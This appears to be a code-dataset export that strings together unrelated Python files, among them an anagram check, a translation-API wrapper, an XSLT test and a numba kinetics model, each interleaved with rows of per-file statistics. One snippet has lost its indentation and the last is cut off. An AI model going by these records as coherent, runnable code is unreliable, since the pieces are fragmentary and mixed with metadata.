from collections import Counter
def scramble(s1, s2):
return Counter(s1) & Counter(s2) == Counter(s2)
| 26.5
| 51
| 0.716981
| 15
| 106
| 5.066667
| 0.6
| 0.236842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.05618
| 0.160377
| 106
| 4
| 51
| 26.5
| 0.797753
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8ef7c2dbf0a0988a526a08c8ed777e5274a7bb35
| 3,443
|
py
|
Python
|
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | 1
|
2022-02-23T01:24:46.000Z
|
2022-02-23T01:24:46.000Z
|
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | null | null | null |
dictionary.py
|
maksim-py/PhDictionary
|
84b9201cd5f65f1682102c3bac45d18a338d06e2
|
[
"MIT"
] | null | null | null |
from phdictionary.requestor import Requester
from phdictionary.file_manager import FileManager
# Definition block
# {
def get_definition(word, number_of_examples=0, grammar_mark=False):
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_definition_1(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_definition_1(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_definition_1(word, number_of_examples, grammar_mark)[1:]
return r.get_definition_1(word, number_of_examples, grammar_mark)
# }
# Translation block
# {
def get_french_english(word, number_of_examples=0, grammar_mark=False):
try:
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_french_english_q(word, number_of_examples, grammar_mark)[1:]
return r.get_french_english_q(word, number_of_examples, grammar_mark)
except:
print('Try again, something went wrong. It might be spelling')
def get_english_french(word, number_of_examples=0, grammar_mark=False):
try:
r = Requester()
if grammar_mark == False and number_of_examples == 0:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[1:2]
elif grammar_mark == True and number_of_examples == 0:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[:2]
elif number_of_examples != 0 and grammar_mark == False:
return r.get_eng_fr(word, number_of_examples, grammar_mark)[1:]
return r.get_eng_fr(word, number_of_examples, grammar_mark)
except:
print('Try again, something went wrong. It might be spelling')
def get_french_russian(word, number_of_examples=0, ):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'fr-ru')
def get_russian_french(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'ru-fr')
def get_russian_english(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'ru-en')
def get_english_russian(word, number_of_examples=0):
r = Requester()
return r.get_glosbe(word, number_of_examples, 'en-ru')
# }
# Synonym block
# {
def get_synonym(word, number_of_syn=1):
try:
r = Requester()
return r.get_synonym(word, number_of_syn)
except:
print('Try again, something went wrong. It might be spelling')
# }
# Files block
# {
def get_french_english_from_file(file, number_of_examples=0):
f = FileManager()
return f.txt_french_english(file, number_of_examples)
def get_synonyms_from_file(file, number_of_syn=1):
f = FileManager()
return f.syn_txt(file, number_of_syn)
def get_definition_from_file(file, number_of_examples=0):
f = FileManager()
return f.definition(file, number_of_examples)
def get_english_french_from_file(file, number_of_examples=0):
f = FileManager()
return f.txt_english_french(file, number_of_examples)
# }
| 33.105769
| 86
| 0.715655
| 510
| 3,443
| 4.488235
| 0.107843
| 0.146789
| 0.265618
| 0.200961
| 0.846658
| 0.812582
| 0.756662
| 0.756662
| 0.740498
| 0.740498
| 0
| 0.013228
| 0.187627
| 3,443
| 103
| 87
| 33.427184
| 0.805148
| 0.022074
| 0
| 0.461538
| 0
| 0
| 0.053369
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184615
| false
| 0
| 0.030769
| 0
| 0.538462
| 0.046154
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
f13111eb9db9f989894947631975f7c0478f9a50
| 4,383
|
py
|
Python
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dp_20011217.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | 1
|
2020-07-26T03:57:45.000Z
|
2020-07-26T03:57:45.000Z
|
#Dave's Pawson's identity transform problem
from Xml.Xslt import test_harness
source_1="""<elem xmlns="http:default.com" xmlns:foo="http://foo.com">
<foo:child/>
</elem>"""
sheet_1="""<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0"
>
<!-- identity transforms. -->
<xsl:template match="*">
<xsl:element name="{name(.)}" namespace="http://www.w3.org/1999/xhtml">
<xsl:apply-templates select="@*" />
<xsl:apply-templates />
</xsl:element>
</xsl:template>
<xsl:template match="@*">
<xsl:copy-of select="." />
</xsl:template>
</xsl:stylesheet>"""
sheet_2="""<xsl:stylesheet
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:foo="http://foo.com"
version="1.0"
>
<!-- identity transforms. -->
<xsl:template match="*">
<xsl:element name="{name(.)}" xmlns="http://www.w3.org/1999/xhtml">
<xsl:apply-templates select="@*" />
<xsl:apply-templates />
</xsl:element>
</xsl:template>
<xsl:template match="@*">
<xsl:copy-of select="." />
</xsl:template>
</xsl:stylesheet>"""
source_2="""<html>
<head>
<title>The TCS Review 2000/2001 - Working Together</title>
<meta name="NCC:Format" content="Daisy 2.0"/>
<meta name="NCC:Publisher" content="RNIB"/>
<meta name="NCC:Identifier" content="UK:RNIB:6DCA50D0-E4E2-4472-A2DA-"/>
<meta name="NCC:Charset" content="ISO-8859-1"/>
<meta name="dc:title" content="The TCS Review 2000/2001 - Working Together"/>
<meta name="dc:format" content="Daisy 2.0"/>
<meta name="dc:creator" content="David Gordon - RNIB"/>
<meta name="dc:subject" content="Factual"/>
<meta name="ncc:narrator" content="mixed voices"/>
<meta name="ncc:generator" content="LpStudioGen 1.5"/>
<meta name="ncc:tocitems" content="70"/>
<meta name="ncc:page-front" content="0"/>
<meta name="ncc:page-normal" content="0"/>
<meta name="ncc:page-special" content="0"/>
<meta name="ncc:totaltime" content="01:23:19"/>
</head>
</html>"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<elem xmlns='http://www.w3.org/1999/xhtml'>
<foo:child xmlns:foo='http://www.w3.org/1999/xhtml'/>
</elem>"""
expected_2 = """<?xml version='1.0' encoding='UTF-8'?>
<elem xmlns='http://www.w3.org/1999/xhtml'>
<foo:child xmlns:foo='http://foo.com'/>
</elem>"""
expected_3="""<?xml version='1.0' encoding='UTF-8'?>
<html xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>The TCS Review 2000/2001 - Working Together</title>
<meta name='NCC:Format' content='Daisy 2.0'/>
<meta name='NCC:Publisher' content='RNIB'/>
<meta name='NCC:Identifier' content='UK:RNIB:6DCA50D0-E4E2-4472-A2DA-'/>
<meta name='NCC:Charset' content='ISO-8859-1'/>
<meta name='dc:title' content='The TCS Review 2000/2001 - Working Together'/>
<meta name='dc:format' content='Daisy 2.0'/>
<meta name='dc:creator' content='David Gordon - RNIB'/>
<meta name='dc:subject' content='Factual'/>
<meta name='ncc:narrator' content='mixed voices'/>
<meta name='ncc:generator' content='LpStudioGen 1.5'/>
<meta name='ncc:tocitems' content='70'/>
<meta name='ncc:page-front' content='0'/>
<meta name='ncc:page-normal' content='0'/>
<meta name='ncc:page-special' content='0'/>
<meta name='ncc:totaltime' content='01:23:19'/>
</head>
</html>"""
def Test(tester):
tester.startGroup("element with namespace attr")
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_1,
title='test 1')
source = test_harness.FileInfo(string=source_1)
sheet = test_harness.FileInfo(string=sheet_2)
test_harness.XsltTest(tester, source, [sheet], expected_2,
title='test 2')
source = test_harness.FileInfo(string=source_2)
sheet = test_harness.FileInfo(string=sheet_1)
test_harness.XsltTest(tester, source, [sheet], expected_3,
title='test 3')
source = test_harness.FileInfo(string=source_2)
sheet = test_harness.FileInfo(string=sheet_2)
test_harness.XsltTest(tester, source, [sheet], expected_3,
title='test 4')
tester.groupDone()
return
| 35.346774
| 85
| 0.623089
| 584
| 4,383
| 4.621575
| 0.183219
| 0.088922
| 0.089663
| 0.035569
| 0.89811
| 0.882549
| 0.87625
| 0.855873
| 0.855873
| 0.855873
| 0
| 0.048414
| 0.180014
| 4,383
| 123
| 86
| 35.634146
| 0.70256
| 0.009582
| 0
| 0.451923
| 0
| 0.038462
| 0.757373
| 0.076037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009615
| false
| 0
| 0.009615
| 0
| 0.028846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f13c00105c3d83e9b1a116a4b3489e676f16c368
| 8,786
|
py
|
Python
|
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | 2
|
2022-02-23T12:03:32.000Z
|
2022-02-23T14:27:29.000Z
|
tests/test_model.py
|
Will-Robin/NorthNet
|
343238afbefd02b7255ef6013cbfb0e801bc2b3b
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import numba
@numba.jit(numba.float64[:](numba.float64,numba.float64[:],numba.float64[:]),
locals={'P': numba.float64[:],'F': numba.float64[:,:],'I':numba.float64[:]},nopython=True)
def model_function(time, S, k):
P = np.zeros(len(S))
F = np.array(
[[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.000000000],
[0.008333333]])
idx = np.abs(F[0] - time).argmin()
I = F[1:-1,idx]
sigma_flow = F[-1,idx]
P[0] = -k[0]*S[0]*S[1]-k[16]*S[0]*S[2]
P[1] = +k[0]*S[0]*S[1]+k[4]*S[8]*S[1]+k[9]*S[6]*S[1]+k[13]*S[8]*S[1]+k[20]*S[13]*S[1]+k[22]*S[25]*S[1]+k[25]*S[25]*S[1]+k[27]*S[4]*S[1]+k[28]*S[12]*S[1]+k[32]*S[11]*S[1]+k[36]*S[7]*S[1]+k[38]*S[11]*S[1]+k[43]*S[33]*S[1]+k[50]*S[19]*S[1]+k[54]*S[27]*S[1]-k[0]*S[0]*S[1]-k[4]*S[8]*S[1]-k[9]*S[6]*S[1]-k[13]*S[8]*S[1]-k[18]*S[10]*S[22]*S[1]-k[20]*S[13]*S[1]-k[22]*S[25]*S[1]-k[25]*S[25]*S[1]-k[27]*S[4]*S[1]-k[28]*S[12]*S[1]-k[32]*S[11]*S[1]-k[36]*S[7]*S[1]-k[38]*S[11]*S[1]-k[43]*S[33]*S[1]-k[50]*S[19]*S[1]-k[54]*S[27]*S[1]-k[55]*S[10]*S[12]*S[1]
P[2] = +k[0]*S[0]*S[1]+k[6]*S[8]+k[27]*S[4]*S[1]+k[43]*S[33]*S[1]+k[47]*S[17]+k[49]*S[16]+k[52]*S[20]+k[53]*S[25]-k[1]*S[2]*S[3]-k[3]*S[7]*S[2]-k[8]*S[2]*S[10]-k[11]*S[4]*S[2]-k[12]*S[7]*S[2]-k[15]*S[4]*S[2]-k[16]*S[0]*S[2]-k[19]*S[4]*S[2]-k[56]*S[2]*S[10]
P[3] = +k[1]*S[2]+k[14]*S[18]+k[23]*S[28]+k[26]*S[30]+k[31]*S[26]+k[33]*S[32]+k[39]*S[30]+k[40]*S[18]+k[44]*S[26]+k[51]*S[18]-k[1]*S[2]*S[3]-k[14]*S[18]*S[3]-k[23]*S[28]*S[3]-k[26]*S[30]*S[3]-k[31]*S[26]*S[3]-k[33]*S[32]*S[3]-k[39]*S[30]*S[3]-k[40]*S[18]*S[3]-k[44]*S[26]*S[3]-k[51]*S[18]*S[3]
P[4] = +k[1]*S[2]+k[24]*S[6]+k[37]*S[5]*S[10]+k[49]*S[16]+k[52]*S[20]+k[53]*S[25]-k[2]*S[4]*S[5]-k[11]*S[4]*S[2]-k[15]*S[4]*S[2]-k[19]*S[4]*S[2]-k[27]*S[4]*S[1]
P[5] = +k[24]*S[6]+k[36]*S[7]*S[1]+k[41]*S[12]+k[45]*S[22]-k[2]*S[4]*S[5]-k[7]*S[7]*S[5]-k[17]*S[7]*S[5]-k[37]*S[5]*S[10]-k[42]*S[5]*S[10]
P[6] = +k[2]*S[4]*S[5]-k[9]*S[6]*S[1]-k[24]*S[6]
P[7] = +k[6]*S[8]+k[30]*S[11]+k[41]*S[12]+k[45]*S[22]+k[47]*S[17]+k[48]*S[15]-k[3]*S[7]*S[2]-k[7]*S[7]*S[5]-k[12]*S[7]*S[2]-k[17]*S[7]*S[5]-k[36]*S[7]*S[1]
P[8] = +k[3]*S[7]*S[2]+k[51]*S[18]-k[4]*S[8]*S[1]-k[6]*S[8]-k[13]*S[8]*S[1]
P[9] = +k[4]*S[8]*S[1]-k[5]*S[9]*S[10]-k[34]*S[9]*S[10]
P[10] = -k[5]*S[9]*S[10]-k[8]*S[2]*S[10]-k[10]*S[14]*S[10]-k[18]*S[10]*S[22]*S[1]-k[21]*S[26]*S[10]-k[29]*S[26]*S[10]-k[34]*S[9]*S[10]-k[35]*S[31]*S[10]-k[37]*S[5]*S[10]-k[42]*S[5]*S[10]-k[46]*S[26]*S[10]-k[55]*S[10]*S[12]*S[1]-k[56]*S[2]*S[10]-k[57]*S[18]*S[10]
P[11] = +k[5]*S[9]*S[10]+k[26]*S[30]-k[30]*S[11]-k[32]*S[11]*S[1]-k[38]*S[11]*S[1]
P[12] = +k[7]*S[7]*S[5]-k[28]*S[12]*S[1]-k[41]*S[12]-k[55]*S[10]*S[12]*S[1]
P[13] = +k[8]*S[2]*S[10]+k[31]*S[26]-k[20]*S[13]*S[1]
P[14] = +k[9]*S[6]*S[1]-k[10]*S[14]*S[10]
P[15] = +k[10]*S[14]*S[10]+k[33]*S[32]-k[48]*S[15]
P[16] = +k[11]*S[4]*S[2]+k[34]*S[9]*S[10]-k[49]*S[16]
P[17] = +k[12]*S[7]*S[2]+k[46]*S[26]*S[10]-k[47]*S[17]
P[18] = +k[13]*S[8]*S[1]+k[50]*S[19]*S[1]+k[54]*S[27]*S[1]-k[14]*S[18]*S[3]-k[40]*S[18]*S[3]-k[51]*S[18]*S[3]-k[57]*S[18]*S[10]
P[19] = +k[14]*S[18]+k[29]*S[26]*S[10]+k[35]*S[31]*S[10]-k[50]*S[19]*S[1]
P[20] = +k[15]*S[4]*S[2]-k[52]*S[20]
P[21] = +k[16]*S[0]*S[2]
P[22] = +k[17]*S[7]*S[5]+k[44]*S[26]-k[18]*S[10]*S[22]*S[1]-k[45]*S[22]
P[23] = +k[18]*S[10]*S[22]*S[1]
P[24] = +k[18]*S[10]*S[22]*S[1]+k[55]*S[10]*S[12]*S[1]
P[25] = +k[19]*S[4]*S[2]+k[39]*S[30]-k[22]*S[25]*S[1]-k[25]*S[25]*S[1]-k[53]*S[25]
P[26] = +k[20]*S[13]*S[1]+k[28]*S[12]*S[1]-k[21]*S[26]*S[10]-k[29]*S[26]*S[10]-k[31]*S[26]*S[3]-k[44]*S[26]*S[3]-k[46]*S[26]*S[10]
P[27] = +k[21]*S[26]*S[10]+k[40]*S[18]-k[54]*S[27]*S[1]
P[28] = +k[22]*S[25]*S[1]-k[23]*S[28]*S[3]
P[29] = +k[23]*S[28]
P[30] = +k[25]*S[25]*S[1]+k[38]*S[11]*S[1]-k[26]*S[30]*S[3]-k[39]*S[30]*S[3]
P[31] = +k[30]*S[11]+k[48]*S[15]-k[35]*S[31]*S[10]
P[32] = +k[32]*S[11]*S[1]-k[33]*S[32]*S[3]
P[33] = +k[42]*S[5]*S[10]-k[43]*S[33]*S[1]
P[34] = +k[55]*S[10]*S[12]*S[1]
P[35] = +k[56]*S[2]*S[10]
P[36] = +k[57]*S[18]*S[10]
return P
def wrapper_function(time, S, k):
    """Adapter with the (t, y, params) signature expected by ODE solvers.

    Simply forwards to ``model_function``, which evaluates the rate of
    change of every species concentration in ``S`` given rate constants ``k``.
    """
    derivatives = model_function(time, S, k)
    return derivatives
# Map: canonical SMILES string -> index of that species in the
# concentration vector S (and in the derivative vector P).
species = {
    'O=C(CO)CO':0,
    '[OH-]':1,
    'OC=C(O)CO':2,
    'O':3,
    'O=C[C@H](O)CO':4,
    'OC=CO':5,
    'O=C[C@@H](O)[C@@H](O)[C@H](O)CO':6,
    'O=CCO':7,
    'O=C(CO)[C@H](O)[C@H](O)CO':8,
    'OC=C(O)[C@H](O)[C@H](O)CO':9,
    'C=O':10,
    'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':11,
    'O=C[C@@H](O)[C@H](O)CO':12,
    'O=C(CO)[C@H](O)CO':13,
    'OC=C(O)[C@@H](O)[C@H](O)CO':14,
    'O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':15,
    'O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':16,
    'O=C[C@@](O)(CO)[C@H](O)CO':17,
    'OCC(O)=C(O)[C@H](O)CO':18,
    'O=C([C@@H](O)CO)[C@H](O)CO':19,
    'O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO':20,
    'O=C[C@@](O)(CO)C(O)(CO)CO':21,
    'O=C[C@H](O)[C@H](O)CO':22,
    'OC[C@H](O)[C@H](O)CO':23,
    'O=CO':24,
    'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':25,
    'OC=C(O)[C@H](O)CO':26,
    'O=C([C@H](O)CO)[C@H](O)CO':27,
    'OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO':28,
    'O=C[C@H](O)[C@H](O)[C@H](O)[C@H](O)CO':29,
    'OCC(O)=C(O)[C@H](O)[C@H](O)CO':30,
    'OC=C(O)[C@@H](O)CO':31,
    'OC[C@H](O)C(O)=C(O)[C@H](O)CO':32,
    'O=C[C@@H](O)CO':33,
    'OC[C@@H](O)[C@H](O)CO':34,
    'O=CC(O)(CO)CO':35,
    'O=C(CO)[C@](O)(CO)[C@H](O)CO':36,
}
# Map: reaction SMILES ("reactants>>products") -> index of its rate
# constant in the vector k. The indices match the k[i] terms used in
# model_function above.
reactions = {
    'O=C(CO)CO.[OH-]>>OC=C(O)CO.[OH-]':0,
    'O.OC=C(O)CO>>O.O=C[C@H](O)CO':1,
    'O=C[C@H](O)CO.OC=CO>>O=C[C@@H](O)[C@@H](O)[C@H](O)CO':2,
    'O=CCO.OC=C(O)CO>>O=C(CO)[C@H](O)[C@H](O)CO':3,
    'O=C(CO)[C@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)[C@H](O)CO.[OH-]':4,
    'C=O.OC=C(O)[C@H](O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':5,
    'O=C(CO)[C@H](O)[C@H](O)CO>>O=CCO.OC=C(O)CO':6,
    'O=CCO.OC=CO>>O=C[C@@H](O)[C@H](O)CO':7,
    'C=O.OC=C(O)CO>>O=C(CO)[C@H](O)CO':8,
    'O=C[C@@H](O)[C@@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@@H](O)[C@H](O)CO.[OH-]':9,
    'C=O.OC=C(O)[C@@H](O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':10,
    'O=C[C@H](O)CO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':11,
    'O=CCO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@H](O)CO':12,
    'O=C(CO)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':13,
    'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@H](O)CO':14,
    'O=C[C@H](O)CO.OC=C(O)CO>>O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO':15,
    'O=C(CO)CO.OC=C(O)CO>>O=C[C@@](O)(CO)C(O)(CO)CO':16,
    'O=CCO.OC=CO>>O=C[C@H](O)[C@H](O)CO':17,
    'C=O.O=C[C@H](O)[C@H](O)CO.[OH-]>>O=CO.OC[C@H](O)[C@H](O)CO':18,
    'O=C[C@H](O)CO.OC=C(O)CO>>O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':19,
    'O=C(CO)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)CO.[OH-]':20,
    'C=O.OC=C(O)[C@H](O)CO>>O=C([C@H](O)CO)[C@H](O)CO':21,
    'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]':22,
    'O.OC=C(O)[C@H](O)[C@H](O)[C@H](O)CO>>O.O=C[C@H](O)[C@H](O)[C@H](O)[C@H](O)CO':23,
    'O=C[C@@H](O)[C@@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=CO':24,
    'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)[C@H](O)CO.[OH-]':25,
    'O.OCC(O)=C(O)[C@H](O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO':26,
    'O=C[C@H](O)CO.[OH-]>>OC=C(O)CO.[OH-]':27,
    'O=C[C@@H](O)[C@H](O)CO.[OH-]>>OC=C(O)[C@H](O)CO.[OH-]':28,
    'C=O.OC=C(O)[C@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)CO':29,
    'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO>>O=CCO.OC=C(O)[C@@H](O)CO':30,
    'O.OC=C(O)[C@H](O)CO>>O.O=C(CO)[C@H](O)CO':31,
    'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO.[OH-]>>OC[C@H](O)C(O)=C(O)[C@H](O)CO.[OH-]':32,
    'O.OC[C@H](O)C(O)=C(O)[C@H](O)CO>>O.O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO':33,
    'C=O.OC=C(O)[C@H](O)[C@H](O)CO>>O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO':34,
    'C=O.OC=C(O)[C@@H](O)CO>>O=C([C@@H](O)CO)[C@H](O)CO':35,
    'O=CCO.[OH-]>>OC=CO.[OH-]':36,
    'C=O.OC=CO>>O=C[C@H](O)CO':37,
    'O=C([C@@H](O)CO)[C@H](O)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)[C@H](O)CO.[OH-]':38,
    'O.OCC(O)=C(O)[C@H](O)[C@H](O)CO>>O.O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO':39,
    'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C([C@H](O)CO)[C@H](O)CO':40,
    'O=C[C@@H](O)[C@H](O)CO>>O=CCO.OC=CO':41,
    'C=O.OC=CO>>O=C[C@@H](O)CO':42,
    'O=C[C@@H](O)CO.[OH-]>>OC=C(O)CO.[OH-]':43,
    'O.OC=C(O)[C@H](O)CO>>O.O=C[C@H](O)[C@H](O)CO':44,
    'O=C[C@H](O)[C@H](O)CO>>O=CCO.OC=CO':45,
    'C=O.OC=C(O)[C@H](O)CO>>O=C[C@@](O)(CO)[C@H](O)CO':46,
    'O=C[C@@](O)(CO)[C@H](O)CO>>O=CCO.OC=C(O)CO':47,
    'O=C([C@@H](O)CO)[C@@H](O)[C@H](O)CO>>O=CCO.OC=C(O)[C@@H](O)CO':48,
    'O=C[C@@](O)(CO)[C@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':49,
    'O=C([C@@H](O)CO)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':50,
    'O.OCC(O)=C(O)[C@H](O)CO>>O.O=C(CO)[C@H](O)[C@H](O)CO':51,
    'O=C[C@@](O)(CO)[C@@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':52,
    'O=C(CO)[C@H](O)[C@H](O)[C@H](O)CO>>O=C[C@H](O)CO.OC=C(O)CO':53,
    'O=C([C@H](O)CO)[C@H](O)CO.[OH-]>>OCC(O)=C(O)[C@H](O)CO.[OH-]':54,
    'C=O.O=C[C@@H](O)[C@H](O)CO.[OH-]>>O=CO.OC[C@@H](O)[C@H](O)CO':55,
    'C=O.OC=C(O)CO>>O=CC(O)(CO)CO':56,
    'C=O.OCC(O)=C(O)[C@H](O)CO>>O=C(CO)[C@](O)(CO)[C@H](O)CO':57,
}
# No externally-fed (input) species for this model.
inputs = {
}
k = np.zeros(max(reactions.values())+1) # rate constants
S = np.zeros(len(species)) # initial concentrations
C = np.zeros(len(inputs)) # input concentrations
# Simulation timing parameters (seconds).
time_offset = 9000.0
lead_in_time = 8130.25
| 48.274725
| 546
| 0.459936
| 2,839
| 8,786
| 1.420923
| 0.039803
| 0.111056
| 0.166584
| 0.173525
| 0.841349
| 0.785573
| 0.738473
| 0.60585
| 0.577095
| 0.504462
| 0
| 0.147646
| 0.042568
| 8,786
| 182
| 547
| 48.274725
| 0.331907
| 0.006601
| 0
| 0.030675
| 0
| 0.392638
| 0.433467
| 0.415587
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01227
| false
| 0
| 0.01227
| 0.006135
| 0.03681
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f1877cd6a90592d2cec06512180d03f6c81a36b1
| 40
|
py
|
Python
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | 1
|
2020-08-17T06:51:53.000Z
|
2020-08-17T06:51:53.000Z
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | 20
|
2020-04-22T15:15:18.000Z
|
2020-08-06T14:07:03.000Z
|
tests/test_api.py
|
lingpy/linse
|
139e54c4ce281a2cd5db1b4da4c516ec1e47dbf2
|
[
"Apache-2.0"
] | null | null | null |
import linse
def test_api():
    """Placeholder smoke test: passes as long as the package imports cleanly."""
    pass
| 6.666667
| 15
| 0.65
| 6
| 40
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.275
| 40
| 5
| 16
| 8
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
74fb9ef4a6438457c030e6f371b97052d668d294
| 10,261
|
py
|
Python
|
src/text_alignment.py
|
developers-cosmos/Meme-Generator
|
fba9b6ca8567228e98f9b7f9e2a7e8407f825cd7
|
[
"Apache-2.0"
] | 75
|
2020-04-29T09:22:19.000Z
|
2021-09-29T09:06:45.000Z
|
src/text_alignment.py
|
jaffery0605/Meme-Generator
|
74e32c76fda5252e0ee2e7dff88f0eccecc04c1b
|
[
"Apache-2.0"
] | 9
|
2020-05-08T09:06:20.000Z
|
2022-02-14T17:34:37.000Z
|
src/text_alignment.py
|
jaffery0605/Meme-Generator
|
74e32c76fda5252e0ee2e7dff88f0eccecc04c1b
|
[
"Apache-2.0"
] | 30
|
2020-04-28T15:15:20.000Z
|
2022-01-13T03:32:33.000Z
|
import random
import cv2
from PIL import Image,ImageDraw,ImageFont
import numpy as np
def lenghth(a):
    """Pick a font size (in points) for caption *a* based on its length.

    Short captions get a large fixed size, medium ones a smaller fixed
    size, and longer captions shrink linearly with length.

